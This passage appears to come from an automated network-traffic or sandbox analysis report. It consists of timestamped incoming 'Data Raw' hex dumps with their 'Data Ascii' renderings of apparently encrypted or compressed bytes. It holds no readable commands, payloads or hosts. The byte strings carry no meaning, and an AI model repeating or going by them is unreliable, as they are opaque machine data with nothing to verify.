7e 4d 9d f2 ac a2 cf ea a1 7f 46 28 b6 43 fa 0f 2d bd 63 1c ee f0 53 a7 a1 03 a5 b1 79 b2 Data Ascii: 2<f\u55/i!uXr`##rbiu4(8HhWn'hF2'He-[Te;Q+3aWD5R-COg;5?HSN~kMGz,tE!VVpy(q2`n&-YFj~MF(C-cSy
2023-10-13 13:21:16 UTC	8942	IN	Data Raw: 45 14 e6 bd bb ee 02 06 3f d3 2f 9c 99 1e 4c 3e 9c 9c a4 68 b0 59 ac 7f 1d 05 73 9c 62 8f 8b 9e 51 d4 15 60 fa 25 b2 ba 6f e5 4e d5 b4 32 1b c7 31 e2 7f c0 19 e0 18 c0 86 30 97 44 9d 82 c8 4b 67 bf 82 e6 15 d7 5a d9 e2 4b 47 af b8 36 88 04 d6 8a 82 06 09 9b b8 42 c4 22 3c 50 61 ed 0c 24 30 3a 4a 0b fd 11 fb 15 60 15 0a 68 77 ea 3a b9 59 ef 9c bf f3 74 18 75 9d 61 0c c1 67 93 1c 9c 1c 8e 3e f3 06 ad 8b 77 19 c8 e4 4e 8d e6 df ab 30 4d 3d 35 bc d2 a4 cf f4 aa 88 7e 52 0c c4 cf da 24 54 ed a8 ac 65 f5 f4 88 47 30 6b 3f cb 22 7b 6c 87 91 e9 14 79 64 8e 94 b8 42 78 3e 1c 77 71 ca 3c 2f 79 06 18 a5 2e 9d 7a c3 5f fa 1b de 9c 16 9f 73 47 3b bc 42 ce 15 5e e1 96 2a 72 12 20 96 51 34 2f 9c da 6e 8d c5 e8 3c ed 0a e5 5e bc 61 ec 32 9b 91 31 5e 07 2f 14 ba 56 6c ee Data Ascii: E?/L>hYsbQ`%oN210DKgZKG6B"<Pa$0:J`hw:Ytuag>wN0M=5~R$TeG0k?"{lydBx>wq</y.z_sG;B^*r Q4/n<^a21^/Vl
2023-10-13 13:21:16 UTC	8958	IN	Data Raw: 17 7a 91 96 ec 57 c4 1b c8 f1 95 5b 66 7c c1 d1 2e 7f 6a 0d f6 96 d4 77 15 fd 89 08 6c 67 24 85 e2 20 3f 25 28 96 c5 44 68 dc c7 cd d8 8a 6b fe 3d f2 25 2c b3 9b 93 1e 48 dd fc 78 c8 7b 8d 9b 69 fa f7 28 8a dd 5c d8 29 86 98 12 67 f7 25 be 44 1f 60 54 15 80 ad 2a 82 00 2b 7f 7a 72 93 54 92 df ef 55 e2 36 71 55 b0 1e c1 8c d6 4f 6f 1b da 0c 2b 97 95 47 e0 0a 17 90 91 86 d9 f3 b7 f5 3d 36 38 ab 8a ee 81 c6 6f 33 dc 7c b6 57 78 12 c0 08 54 0d 92 78 49 6d b9 5d a9 de 06 99 ff 77 b0 77 8b c7 20 91 f5 2c 5e d4 c7 5c de b8 eb 2b 2b 6a a4 8f c0 e3 4b 35 4b 27 f9 c9 b0 62 81 c9 ac 04 29 a2 56 3b c5 fb 5d 15 ee af 02 5a 61 41 c5 de 1c b9 b1 19 30 e4 df f4 1a ca 10 c2 18 af 03 b6 a8 be 0a 47 22 46 1b a0 a9 f3 82 50 f2 06 8c 6b da 56 7c 8a c1 05 ec a7 15 a1 7f 2a 30 Data Ascii: zW[f\|.jwlg$ ?%(Dhk=%,Hx{i(\)g%D`T+zrTU6qUOo+G=68o3\|WxTxIm]ww ,^\++jK5K'b)V;]ZaA0G"FPkV\|0
2023-10-13 13:21:16 UTC	8974	IN	Data Raw: 34 b9 bd 77 4a f5 9b e2 33 13 df 9b 0a ff c6 d9 43 ce 6c 62 1d 70 c1 20 b7 1b a3 dc 50 d8 76 1e 26 47 5d 73 fa c0 d7 91 7d 01 e1 b2 e3 87 71 ba b0 c4 47 07 02 7a ad a9 6d 1d c8 1f 0a 5c 38 9c 28 a4 42 4f a4 1b a7 37 5c 56 54 9e 2e 45 e0 c0 2c d4 5a ea ac 1a f1 5d 50 69 fb 42 aa 36 9b d7 43 c7 2b 76 41 e5 49 1c 63 3a 62 bc 65 2a ea df 52 f4 57 62 b9 5a e6 41 a5 9a 1b 8b 18 5e be 06 d6 1d 4c 8d 9b 28 61 d5 6b 4d ef d1 4b 2a b4 00 6e 6f b7 a0 a6 12 73 d0 c6 e3 78 ab 5a 7a 3d c8 bd c2 32 ca 19 28 c9 49 2b 18 de f9 44 93 28 69 24 5c f1 8b 18 5f 60 cb f8 b1 f6 ca e2 c3 de fd 02 83 aa 9c 47 16 54 74 3e aa 32 5f 58 db 07 0b 79 68 1f c5 3f aa cc fe 7d 6e be 24 ff 51 76 0a 8c c3 fa a5 be 62 1a 63 45 6a f7 b9 66 05 ce 97 4e 44 ab 22 37 09 75 bf 5b 41 3f eb db 06 aa Data Ascii: 4wJ3Clbp Pv&G]s}qGzm\8(BO7\VT.E,Z]PiB6C+vAIc:beRWbZA^L(akMKnosxZz=2(I+D(i$\_`GTt>2_Xyh?}n$QvbcEjfND"7u[A?
2023-10-13 13:21:16 UTC	8990	IN	Data Raw: fb 06 c4 ac 48 69 2f 17 fe fa 80 79 03 89 13 7e 52 fd d2 0d 14 22 2e 87 21 e4 e5 ef d5 9c f9 25 eb ae bd c3 c5 e2 4f 43 66 3c af 81 f0 39 bb ed c1 c6 98 4b df 17 8e f3 5a d3 15 6b ff bf b8 6c 3a d5 c8 e4 40 09 19 00 09 e0 44 87 e5 7e 5c 33 b6 0b 59 02 21 96 91 16 9c c8 26 4a 77 89 7a ff 46 77 6e cf 47 f2 44 b9 d3 2f 15 57 12 78 7a 7f a1 62 d4 03 27 05 da 2c 50 dd d9 70 da 1a f1 36 ef a4 a0 83 6f 6e 39 8a b6 81 b2 a0 68 6b ad d4 1b b3 cf d1 7f b0 90 51 a2 03 ef 17 c2 f1 27 e2 d7 e7 51 0d d1 72 9d a6 09 18 22 48 87 de b9 43 d0 38 02 91 c6 d4 6a aa da ec 0c 8c 71 40 4b f3 92 80 1b 0f 74 c6 ca 37 d6 5e 84 96 23 c2 ab f2 46 79 e6 4e 0d fa d5 53 55 15 02 3e 1f dd fb 32 3c f3 17 40 14 8c ae 19 69 cf c2 96 a2 d1 d6 a6 c2 11 09 1b 54 21 f4 0c 09 11 f9 7b 48 e8 17 Data Ascii: Hi/y~R".!%OCf<9KZkl:@D~\3Y!&JwzFwnGD/Wxzb',Pp6on9hkQ'Qr"HC8jq@Kt7^#FyNSU>2<@iT!{H
2023-10-13 13:21:16 UTC	9006	IN	Data Raw: 08 f8 27 6c b9 b3 de 2b ec 73 06 9f 92 7b fd 6d e2 08 19 0f d8 44 f2 1e af 42 ab e9 f7 da 4a 76 da b6 40 41 98 0d e5 ce cd c2 dd 57 a5 95 13 16 a4 e6 25 22 f6 8d 26 8e e4 c8 89 4d 27 b0 eb 55 29 02 06 19 4e 59 13 68 f8 68 3c 16 54 9f a2 45 8f fc 38 b1 64 df bf dd 56 08 a0 6a 78 36 a7 e4 84 18 9c a2 1f de 5b a4 f3 4c e6 95 8d ae b0 7e c6 53 76 c6 83 1d 85 47 e2 61 59 3c 6e 96 d7 2a 18 81 d5 44 cd e2 c5 b1 47 18 ee 16 1f 02 06 57 4a ae a6 87 31 a7 b6 fb 34 af e4 94 54 72 db 18 a7 81 6c 84 0a 88 db 1e 4a 6a 74 4b c3 d9 18 a9 48 2c e9 5a 20 63 71 67 99 f5 00 e7 8d 3b 22 cd d1 e4 5b bb f7 6d 55 02 3c 72 62 be ee 68 40 be 57 4e 12 f5 a0 71 83 0e 51 d8 4b 1b 1a 49 c1 f6 54 dc c9 3d 46 bf 93 98 dc 0d 73 8b 42 a0 8b 23 82 3a 8e da ef c2 c1 cb 8b 52 fa 22 e7 a8 ca Data Ascii: 'l+s{mDBJv@AW%"&M'U)NYhh<TE8dVjx6[L~SvGaY<n*DGWJ14TrlJjtKH,Z cqg;"[mU<rbh@WNqQKIT=FsB#:R"
2023-10-13 13:21:16 UTC	9022	IN	Data Raw: a2 89 c8 f7 89 a9 6f 82 99 28 65 23 9e 67 fb 38 87 89 df 52 63 59 5c 01 89 3d 7f bc f5 e6 fb 4f 80 f0 df b2 36 23 d5 30 06 67 1e 58 52 6a 6c a7 67 c7 91 e2 62 c0 eb 24 a7 66 02 db 04 75 f6 a7 0d f2 e7 1a ab 0e 4b e1 13 5c 7d b6 11 39 da a7 9d e9 40 6a a4 6f d9 da 6d b1 a1 37 8d 08 20 c8 9d 2a 99 13 75 24 36 c7 95 cc 64 cb fb 65 0a 41 87 84 4e 49 7a 0f 60 11 f4 87 4e 20 bc 41 a1 c1 1f fc fe 5c 46 9d a0 aa 08 58 73 81 cb 32 a4 58 78 f4 50 26 c8 a8 4b c3 5f 76 06 e8 d4 1e 89 f8 42 97 de ba 93 6d 3d a9 7e d0 90 6f 47 61 33 0e 9d 4e 69 19 e5 82 a9 14 1e 8f f1 b7 b9 85 45 8a 33 c1 03 e9 dc df 26 cf d3 ed bf 22 cb b4 5d 31 38 c8 35 b0 60 2a 20 6d be 5b 7e 7f 0a d3 ac bd 24 ef ed f0 0d c5 a1 3f e3 63 24 e5 c5 2f 12 f1 79 03 58 91 47 21 90 18 84 ee ad ff d7 d1 33 Data Ascii: o(e#g8RcY\=O6#0gXRjlgb$fuK\}9@jom7 u$6deANIz`N A\FXs2XxP&K_vBm=~oGa3NiE3&"]185` m[~$?c$/yXG!3
2023-10-13 13:21:16 UTC	9038	IN	Data Raw: d0 3c f0 42 f5 cf bb b0 0a ef 0e 0e 11 9a b4 05 8b a0 23 69 f2 b6 85 fd 3c 0a b8 5d be 75 58 df 68 68 d1 dd 9b bf cb 91 63 69 07 33 79 84 3b 0c b4 5f 27 c4 dd 18 87 b2 6b 99 e7 de d6 2f 87 9f d5 29 b6 69 a3 25 b1 95 7b f6 66 6b 5c f9 45 4e 8d 60 74 c4 ea 4b e4 40 3c 3f 47 f9 34 0b c5 7a 94 a3 63 e8 7c 4f a7 ab 6a 8d 6a 35 5f 3f 2c 95 41 35 d3 cc ba e9 94 03 b2 81 0c 13 40 a8 e8 12 06 6c 0e ff a3 79 82 35 50 f2 7a 69 6c bc 76 30 a5 96 12 bf 5b f7 cf f0 b8 22 59 aa f0 e0 22 4e 26 12 90 bf 32 da d6 75 08 db ac 8d 55 bc 86 04 75 dc fb 73 e1 46 55 33 f4 3f 92 92 f5 39 04 d8 9c 13 ea e8 bc ae 1b 62 15 53 26 4a 4b 21 63 f2 99 86 5b a8 c5 8b cd f0 ac 37 a8 12 e2 25 83 1e ed 1c f2 11 e2 f6 1d 08 e4 7c a2 b9 4f 4c 9c 7e 45 fc 5f d1 a4 dd ed 08 0c e2 e7 b0 b4 f4 e4 Data Ascii: <B#i<]uXhhci3y;_'k/)i%{fk\EN`tK@<?G4zc\|Ojj5_?,A5@ly5Pzilv0["Y"N&2uUusFU3?9bS&JK!c[7%\|OL~E_
2023-10-13 13:21:16 UTC	9054	IN	Data Raw: a4 74 7e 0f 16 c8 3e d8 37 6e 13 ce d4 b3 90 7f 30 2b 36 21 33 3d 36 49 45 5a 06 e3 3e ac ce 49 fe 65 7c 45 ff 34 b8 5a 37 74 14 65 87 01 be 40 27 b0 90 c9 c7 4f e7 b7 1f a8 c4 33 ac d8 10 34 24 06 8c 18 dd e4 13 85 98 1f 05 6e 7e a8 25 67 33 d8 0a 0d d4 a7 6d 24 18 3d d3 e9 c7 4d a4 9f 78 0e 23 5f 5e d4 b6 a6 33 5f 35 c9 96 59 8e 45 41 94 f8 a7 f1 7c 30 e2 2c 51 86 9e 4e 6f f1 87 57 d5 49 a2 50 49 42 6b 28 d1 f8 a2 07 a5 5b a5 9e dc 59 99 3e 69 d9 02 5d cc 7a ec 08 ca 5a 8f 01 4f ea 40 c4 cf 77 6d b0 7b 77 26 4a 3d 3d ab 0f 7c 76 4a 82 5a 59 51 a9 0d 3e 9f e7 79 32 f8 01 db ea fa 5e d8 0b ba 50 c2 1c b2 65 c6 0c f2 bf 49 3f 22 6c 75 2e 32 19 92 11 f0 34 f2 4e b1 23 e1 0a 22 cb 4a 5e 7b 74 65 59 f7 ce 8e bd 5a b4 14 1e 61 7f ae 3c 20 32 24 5d 22 4a c8 67 Data Ascii: t~>7n0+6!3=6IEZ>Ie\|E4Z7te@'O34$n~%g3m$=Mx#_^3_5YEA\|0,QNoWIPIBk([Y>i]zZO@wm{w&J==\|vJZYQ>y2^PeI?"lu.24N#"J^{teYZa< 2$]"Jg
2023-10-13 13:21:16 UTC	9070	IN	Data Raw: 64 82 0c 51 b3 1f ac 95 a8 82 fb 8b d9 59 dd b1 a6 29 c0 41 da 51 f2 0b ea dc 08 bd 6a 69 77 d5 fa 31 ca 97 b7 1c 1b 22 cb 9f da 9d ab fc 1e b7 c4 3c 8d c1 73 f8 32 6f c8 24 13 c2 99 fb 98 0d e9 3c c2 95 5f 77 86 b0 ea d5 05 28 fb 54 79 c9 47 15 74 f6 75 b5 4d 06 9b e4 ff c9 0d b5 3d 12 2d dc 2e c3 7e 91 b6 3f e5 ec 64 47 16 9a 2e b2 ea ca c4 1e a7 d2 5d 98 c1 1c cc 62 22 44 d8 2e 4e 12 0d 4a da 40 1a f0 c7 9c 76 18 dc e1 4b be 0d f0 7e 8e e0 ea d2 c6 1e 5f d2 f8 02 ec 01 b3 95 8e bd 9f 5a 5c 44 88 0f 11 4d 38 fb 8a 35 7f d0 e3 c9 d4 23 a4 bb 24 3d d2 e3 fb 6c ca 3c 41 0c b2 23 98 8c f0 cf 0e b9 cc 2c 52 12 c4 0d be ba f0 45 04 12 88 48 da af 46 3e 0d 5c f9 d4 56 cd 0a f1 e7 00 ee d1 7e 2a 00 24 24 62 a4 58 81 cd 2c 6a 7a 6f 60 db 4b 47 0b 2a 3a 36 8d b2 Data Ascii: dQY)AQjiw1"<s2o$<_w(TyGtuM=-.~?dG.]b"D.NJ@vK~_Z\DM85#$=l<A#,REHF>\V~$$bX,jzo`KG:6
2023-10-13 13:21:16 UTC	9086	IN	Data Raw: 1b b2 9b a8 aa 85 47 57 27 1e d3 2e f3 1f 12 a2 c1 41 2a 5c 04 87 c3 35 fe 4c 30 d2 6d 72 84 a9 88 97 a7 bd 46 56 b1 b5 82 b6 f7 75 29 3b 06 f8 c1 53 f1 de 25 8a e3 36 ad db fd e3 0a 09 c4 ab c0 bf f0 0d e7 f0 92 7b 1f a9 fd ae a3 e8 28 c1 eb 07 e7 a8 05 82 05 ba 2e f8 9c e8 b6 19 6a 36 d8 23 5d 10 92 7f 5d 71 7a 9a 9b 76 f5 73 c8 4f 55 79 34 d8 b3 9f 70 10 37 b8 61 07 86 28 1d fd 7e fd 52 fa e0 2b da dd 41 4e d4 93 91 dc 54 be 67 e1 7c 21 75 d1 82 8a d7 1a cb 2c eb 7e ce 3b 1c c1 4a 48 b6 3e 67 6f 4d f2 cb 32 fb 50 9c 6a 42 b9 92 94 f3 87 cf 92 c5 5a 9f cd 18 9f 2c cc 94 55 1e 9f 80 d8 1c 31 68 cc dc 37 18 e3 13 9a d5 d3 81 39 6d 81 6b 2d 14 2a c7 f7 76 32 db 4d b8 92 47 6d 42 18 f6 99 ba 7f 9e 6b c4 3c ea ee de 1d 7f 99 73 67 64 76 c6 40 f4 86 90 76 93 Data Ascii: GW'.A\5L0mrFVu);S%6{(.j6#]]qzvsOUy4p7a(~R+ANTg\|!u,~;JH>goM2PjBZ,U1h79mk-v2MGmBk<sgdv@v
2023-10-13 13:21:16 UTC	9102	IN	Data Raw: 91 ff 47 3c cb 8d f9 aa aa 6a 5d 7d b3 2c 41 98 6e 5a 6f 14 c9 bf c4 3f e0 7d 2b 57 6b 2b 10 ed b6 c9 17 1f 6c ca 99 26 c6 c3 83 3b e3 c3 ae 7b 53 02 26 27 b8 74 cf 24 57 c8 48 9a 3d 4b 28 14 69 f8 39 98 15 c3 48 45 93 aa 9b 9a fb 31 c1 48 2b 1c 8a 40 72 e4 5e 27 5e 4f 89 a8 62 77 a3 29 8a 40 e1 e2 4a 80 ad ef 29 bb 6c 6f 02 27 fa 03 70 9b 0b 8e 97 7b 50 1e 7b 9a f8 98 e5 d2 60 c0 ec a7 f0 1f f5 5c 6b b9 3d 9d 13 ea bd d6 06 a0 85 7c c8 4b ce 87 fd 9f b1 54 7e 7a 06 3a 85 e5 26 e6 d2 b5 29 dc 71 9e 4c 29 54 ab 11 51 e0 34 99 06 f8 9b e0 28 e3 1e 94 3e 98 50 11 d5 15 e9 ee 81 f8 9c f7 cc a4 ae 44 99 ae 4a b2 ab 87 d1 cf 72 11 15 48 e0 89 72 63 10 63 9a 7f be a0 31 a0 39 ef 2a 79 9f 14 0d 63 b9 96 81 44 c6 55 89 10 e0 10 43 0d 0f 65 bd ae 0a 73 9c 19 b7 f7 Data Ascii: G<j]},AnZo?}+Wk+l&;{S&'t$WH=K(i9HE1H+@r^'^Obw)@J)lo'p{P{`\k=\|KT~z:&)qL)TQ4(>PDJrHrcc19*ycDUCes
2023-10-13 13:21:16 UTC	9118	IN	Data Raw: 2b 43 15 da 2a 02 0a 97 b9 f1 21 79 c9 f4 f6 67 84 e2 ab 2b ac e2 ac 20 51 a6 5f d3 94 99 62 ae d0 77 2d 88 c9 45 bb 89 d5 5a 7d b6 1a 97 03 7e 69 4e 0a 79 bb da ce 99 cd e9 ea 90 d9 6b f1 d1 8e b6 d6 f2 85 a8 cd 33 13 22 66 eb d3 9f d1 7a 55 11 ab 10 0e 83 49 e8 a9 ad a2 e6 db 2c 05 ed eb 3e 04 2a a7 1c a2 89 26 b6 5c e7 bb ca 14 11 cb e8 91 88 d2 ee 25 2c dc bf 7b 92 d4 7d c3 42 e6 0c cc 55 5b f4 06 e1 c8 9d de fc be 73 ce 10 3e 00 d9 fa df ed fb 8a 5b 0e 1d af 86 06 88 7a bd 35 52 2c 29 a8 f8 0a e3 31 06 f0 06 f4 1b a5 aa e6 eb 2f 2b 4d 9d d7 56 2b 79 f9 eb 28 1f 33 58 31 ff 24 56 01 0f b1 33 7c 21 f2 c1 2e de ee 73 91 80 2d 66 97 77 1b e5 2b c5 ec cc 63 4f 21 c7 cd 63 cf fa 7a d1 4b c0 4a 39 7b 07 66 f2 cf bb ef d3 41 fa c7 9e 45 98 8a 36 02 d8 96 9a Data Ascii: +C!yg+ Q_bw-EZ}~iNyk3"fzUI,>&\%,{}BU[s>[z5R,)1/+MV+y(3X1$V3\|!.s-fw+cO!czKJ9{fAE6
2023-10-13 13:21:16 UTC	9134	IN	Data Raw: 1f 6e 98 93 81 b4 b0 54 87 ee 3b 97 62 28 f9 32 48 07 e5 e0 ef ca 41 41 f0 37 c2 29 23 d7 1d af db 18 4b 6e 15 33 c9 a4 02 f2 ff 7d d7 88 1c 7c 3c 68 70 d2 6b 53 6c 51 07 eb e8 83 7f f7 59 d6 ce 54 b7 ef ee a2 e8 2b b5 3f b0 9e 9f 06 d5 31 68 5e b1 c7 75 52 6e 8d 48 46 a3 9d 72 56 63 28 f5 24 96 b3 e9 c3 7d ad f7 38 73 f4 bc ca 3e 4b eb 42 0a 6e 4a e3 d5 bf e3 b6 9c ec a0 91 49 54 29 ce 49 fd fa 72 e1 0d 46 be 50 69 65 3e 2f 3d e6 26 c3 3f 08 1a 1c bd 93 b3 a6 2c d5 07 7e 1a 4d 49 26 b8 07 5b c7 70 a2 c2 f1 25 98 f9 b7 55 20 c0 b5 9c 69 e7 ea 52 b0 1c af f3 25 af c8 93 f9 71 ad df 5e c3 45 fd 1b ae 75 63 59 d3 ee c3 73 42 58 65 45 90 4a f8 9b e2 35 c5 c6 e4 b4 7e ee a5 58 51 29 fd 70 c9 8d 6a 2c 35 8f 6b c3 4a 39 13 a9 31 73 1b 92 42 0f 37 22 ff da 9b 4e Data Ascii: nT;b(2HAA7)#Kn3}\|<hpkSlQYT+?1h^uRnHFrVc($}8s>KBnJIT)IrFPie>/=&?,~MI&[p%U iR%q^EucYsBXeEJ5~XQ)pj,5kJ91sB7"N
2023-10-13 13:21:16 UTC	9150	IN	Data Raw: 72 b5 de 3b 09 f2 52 b1 51 cf 21 bc fd 39 38 e7 39 38 a4 06 f4 c6 94 0c 2e e0 95 85 c4 d7 26 73 fb 39 6f 81 42 63 f8 c0 1b 95 01 41 e9 54 94 f2 20 3c c0 6d a4 9f c6 8f 2b c8 7e 76 b6 a8 d5 cc 10 07 6a c8 a0 5e 3c 0c 5e 09 d6 90 6a 10 17 cf 5f 53 f0 d5 99 28 38 9f de e9 1a d4 3c 93 8d 44 ef 90 74 01 ac b5 51 21 c2 31 47 19 fe 2f 16 23 73 d7 dc 97 0e d3 98 9c 35 cf 6c 3f 93 f2 7f 45 f4 8e c3 df 4c 5c ca 3a 15 07 ba 84 59 59 d6 11 a9 dd 94 cb 77 ee 3b 97 ca b4 4c df 3d 82 8d b4 b4 f2 b2 59 22 76 a5 7b 74 ab 97 82 64 8e 33 a4 00 7b 0e 66 ac 05 1e 68 97 b7 ad d7 c8 35 0b ef 40 1f 16 4f 73 ac 3b 0c 35 db 4c 23 76 20 2c d6 bd bf 3f 61 81 6e 28 77 50 26 8c a9 9b 52 32 30 0c 66 96 08 67 52 11 0d 14 2e c6 d3 de 61 59 41 7a 81 f2 e9 6b db e4 e7 88 22 68 1e bf 8e 61 Data Ascii: r;RQ!9898.&s9oBcAT <m+~vj^<^j_S(8<DtQ!1G/#s5l?EL\:YYw;L=Y"v{td3{fh5@Os;5L#v ,?an(wP&R20fgR.aYAzk"ha
2023-10-13 13:21:16 UTC	9166	IN	Data Raw: 66 60 45 db 15 43 05 ec 4f f5 87 2e 67 58 28 2f 4f 4c 37 3d 7d f7 30 56 e2 41 77 6b 48 50 b6 d9 57 ac e1 fc f5 d3 e4 27 bc 00 83 84 75 ea 4d 11 17 ec c5 15 ad 27 8e 50 50 6c 4f 20 96 4d 74 ef 51 c3 a4 e8 e0 8f a2 bb f6 f0 19 b8 17 ac 26 7a 7b 71 63 d9 36 c7 a7 18 43 71 ee da 4c 6e 91 04 2e ff 6c 3c ed cf 4f 62 e6 64 56 1f be 98 2e 87 f1 67 00 f1 0f 6a ed b8 5e 1a 7f ef 01 03 d1 59 f0 2d 3f 49 18 a9 98 ba f5 5f d2 7a ac 7b ff a0 cf cb c7 cb 5f 85 2c 93 79 3f 43 1f e4 bf 89 a7 d6 39 98 d7 71 e1 bc 4d 05 fa 0e 4c de 4b e8 45 59 04 9c 92 a0 78 5f 14 a8 15 43 0b 20 b7 dc e9 15 4f 98 28 57 f6 08 e2 05 04 b8 9a 2b 47 89 7a 28 a5 5b ac bc 09 f8 04 26 f7 2d 8a eb ad cd e2 72 28 82 52 97 60 57 a5 0f a3 28 7d 5b 1f 63 e4 18 ff f4 dc b4 75 3b f9 cc 30 a3 77 ae c1 eb Data Ascii: f`ECO.gX(/OL7=}0VAwkHPW'uM'PPlO MtQ&z{qc6CqLn.l<ObdV.gj^Y-?I_z{_,y?C9qMLKEYx_C O(W+Gz([&-r(R`W(}[cu;0w
2023-10-13 13:21:16 UTC	9182	IN	Data Raw: 37 5c 60 e2 7a e4 d6 16 fc 78 4d e2 a9 19 d6 c1 24 48 ef 07 b1 b0 3a 59 3b d5 c3 b3 4b 44 ac 40 5e 33 d4 4d cb 05 59 f0 d9 dc cd f7 cf 55 96 48 84 0c 9c a2 70 19 dd 4a 4d e0 04 a2 aa ab 33 54 b5 6a 4d be 44 51 be 70 44 2a 69 fa 34 88 af ee 10 bc ec 47 7a bd b9 96 d6 80 be 98 bc d8 f2 6e 6d f4 a9 ae 76 ed c5 ca 4f 52 1b df af 85 b4 f3 06 10 cc 50 4f 3f 16 54 56 f3 1e ea a6 50 17 e0 4e 01 73 59 3c 1d 2f 06 59 fc 63 3f c3 b9 05 f2 78 df c8 50 be 5f b2 6c 02 fb 43 47 ad 3a bd 67 82 d5 9a bc 10 bc 35 f6 a8 07 19 0e 85 69 51 9b a0 bd 1d cb 64 3f a7 20 91 db a1 b3 fe 22 ea 67 e5 73 45 cc 30 a0 dc f4 0b 40 3b 9a 20 41 36 b6 4c 0a 0a 3b 4a c1 02 f2 bd 60 9e 45 8a 12 06 aa 08 1d 9a d0 a7 b5 2a 9e 1e bf a7 a2 e1 7a 0c 3a cd c6 5c 29 b5 9b e9 7d 94 7a c7 36 69 bb 16 Data Ascii: 7\`zxM$H:Y;KD@^3MYUHpJM3TjMDQpDi4GznmvORPO?TVPNsY</Yc?xP_lCG:g5iQd? "gsE0@; A6L;J`Ez:\)}z6i
2023-10-13 13:21:16 UTC	9198	IN	Data Raw: 9a ff fc e4 45 cb 5f 1c 57 e5 15 18 e3 56 37 bb b8 8d 8e 8a 38 bc fb ac b3 2d 65 f7 a7 b4 38 4f e3 b8 66 e4 c7 5c 8c 9b 54 6f 39 63 32 b3 22 69 ca c3 7e c6 b1 8f bc 8c a2 d6 6c 68 b9 b7 03 44 c5 65 96 d2 6d da 1d ec 22 7e ad 11 95 6e 9a 1d 03 c8 d6 9b 30 d5 f5 18 54 3e b5 48 a5 54 b4 96 b0 2f 08 c4 1b 41 2c 8b 13 ed 85 d5 76 cd 10 bc 92 e0 ec b5 3b 46 6c 2f ff 64 75 36 5e 4f 65 00 51 6b 0f 6b 44 d0 57 b5 5f 0d e5 d6 73 16 2e d4 25 6e 7d 87 dc 8d 17 12 0e cd e0 81 c7 77 c6 79 3e d5 f3 99 71 f7 97 de b9 13 ab 39 0f 96 65 0b 7b 09 5f a1 e4 16 2b a3 73 8e ac c0 08 cf aa 5a 15 a2 9c 1a 17 96 ee 79 44 34 ca c4 66 e5 26 16 a6 0a f7 ec de 7d cf 48 70 b2 d0 b6 72 ca 1e 8e ee 6d 3c 79 27 56 19 1e 99 06 24 47 27 16 22 a7 cd 24 bd b2 23 6f f4 5d 1f b1 36 3f 10 20 b0 Data Ascii: E_WV78-e8Of\To9c2"i~lhDem"~n0T>HT/A,v;Fl/du6^OeQkkDW_s.%n}wy>q9e{_+sZyD4f&}Hprm<y'V$G'"$#o]6?
2023-10-13 13:21:16 UTC	9214	IN	Data Raw: 83 58 79 78 ef 72 d5 72 04 b1 fa db 33 73 d4 d3 c3 2a 32 ff fc c0 e0 7e d0 00 94 34 4f e3 0e 94 7c 13 1e 4a e0 81 f7 7f 22 b3 de 1d b1 fe f5 9e 06 2e 4e 41 3c bf 64 7e b4 16 78 4a 63 48 ea a0 04 10 db 0c 67 8e fb 6e ab d2 5b 3a 54 c5 96 ab 1d 3a df 29 92 88 87 37 e7 05 f3 4b 4a ae ee c3 6c 96 5f 1c c0 40 2a 5b b2 00 13 a4 fa 37 ee 8b c1 a4 bb 6f 9e 3d 06 12 67 ac 68 87 90 9e 39 d5 d7 32 46 f6 23 96 ed a2 26 63 7c ec 27 4f b3 c4 44 0c 4c 4a e5 9d 73 a4 6e e0 3e 1f be c5 3b 31 2c ca 40 85 b6 d0 d3 17 96 31 16 82 cf 4f be f2 5e 52 79 d4 4c a9 75 16 a1 d4 51 0f 9c 55 d3 01 aa 5f 80 22 17 c6 fc a5 38 a9 18 81 6c d7 48 d9 f3 ce ec e2 f3 e4 74 d6 a7 05 5c 2f 16 b3 46 e0 27 f6 0b b4 da 69 cf b7 ec b9 62 66 8d 58 c3 95 9b 49 eb cf 9c 9f 6b 5b 2c 13 62 64 aa 1b 9f Data Ascii: Xyxrr3s2~4O\|J".NA<d~xJcHgn[:T:)7KJl_@[7o=gh92F#&c\|'ODLJsn>;1,@1O^RyLuQU_"8lHt\/F'ibfXIk[,bd
2023-10-13 13:21:16 UTC	9230	IN	Data Raw: ca b3 76 0c be 54 c3 89 9c af e1 29 bb 12 50 5c d1 8a 6a 52 09 dd 29 4b 30 e8 b6 c7 1d 61 4d 61 21 8b 1c fb e5 ca 20 0b f5 46 48 51 02 ee a8 38 67 e5 f2 6f 2a b6 56 49 9d 93 92 d1 6f 6e 84 31 23 3d ed bb 4f 92 fc d5 93 82 ce 5f 59 fd 66 1f 8a 04 19 0e b7 1e 52 b9 d7 09 b4 c2 fe c1 be 0c f6 dd 10 f1 19 39 76 8d cf e9 a5 20 37 e7 0d a1 9d 37 5f 9a bc db 9c 7b ad 2b 94 aa 42 bd 64 cb ca 7a 3a 3f 5c 4f 02 70 8e dc 7d cf 51 fb 2f 0d 82 d2 3b 54 6b c6 65 6b 4d 2a b1 97 ce f2 e5 df 2b 30 4f 42 b7 29 f6 0b 8d 35 57 88 09 7a e8 2b 5a 00 7c 94 2d d8 cf 70 dd d4 c0 07 25 6d e4 36 0f 46 2c a6 34 48 f4 d9 0c 3e 0b f0 08 09 b7 4d d8 11 5b e2 09 e4 9f 26 f8 d5 f5 db ed ce 33 9a 2d d4 8a ff 53 3a be e7 62 67 e9 e8 b3 d7 45 1a 4e 3c f1 4d d2 4c 5b dd 6b 78 7e 67 f1 16 36 Data Ascii: vT)P\jR)K0aMa! FHQ8goVIon1#=O_YfR9v 77_{+Bdz:?\Op}Q/;TkekM+0OB)5Wz+Z\|-p%m6F,4H>M[&3-S:bgEN<ML[kx~g6
2023-10-13 13:21:16 UTC	9246	IN	Data Raw: cd 60 b6 16 bd 4c a1 0a 62 e3 ad 1f 34 80 70 d9 e4 1d 0a e5 f7 ed a9 7e 96 2a e6 cb 53 c8 ee 01 b6 9e b6 c5 60 23 f0 a7 b5 6a c2 65 17 6c 5b 3b 55 94 1d ab 46 e2 3b f5 b3 9c 00 14 7d bc bb 90 8d 1f 10 7c a4 08 26 f8 08 8d bb 04 15 68 d9 ad d5 1f 02 74 61 3e 62 65 74 74 21 03 db a0 17 6f e9 69 00 d4 11 e9 11 2c a6 26 f5 c7 54 dc b8 8d 00 f5 c6 f3 23 9f f0 56 cc 8f 4b 96 77 76 6a 63 b8 52 0f fd 90 9a 07 76 43 19 57 05 f6 8a de 5c 86 f1 d2 6e 6d 2d ad be 7d 77 57 0b f1 37 a2 68 85 b1 c8 4e cd f6 99 f8 b9 14 39 e9 cd 8c e0 f8 da f5 da 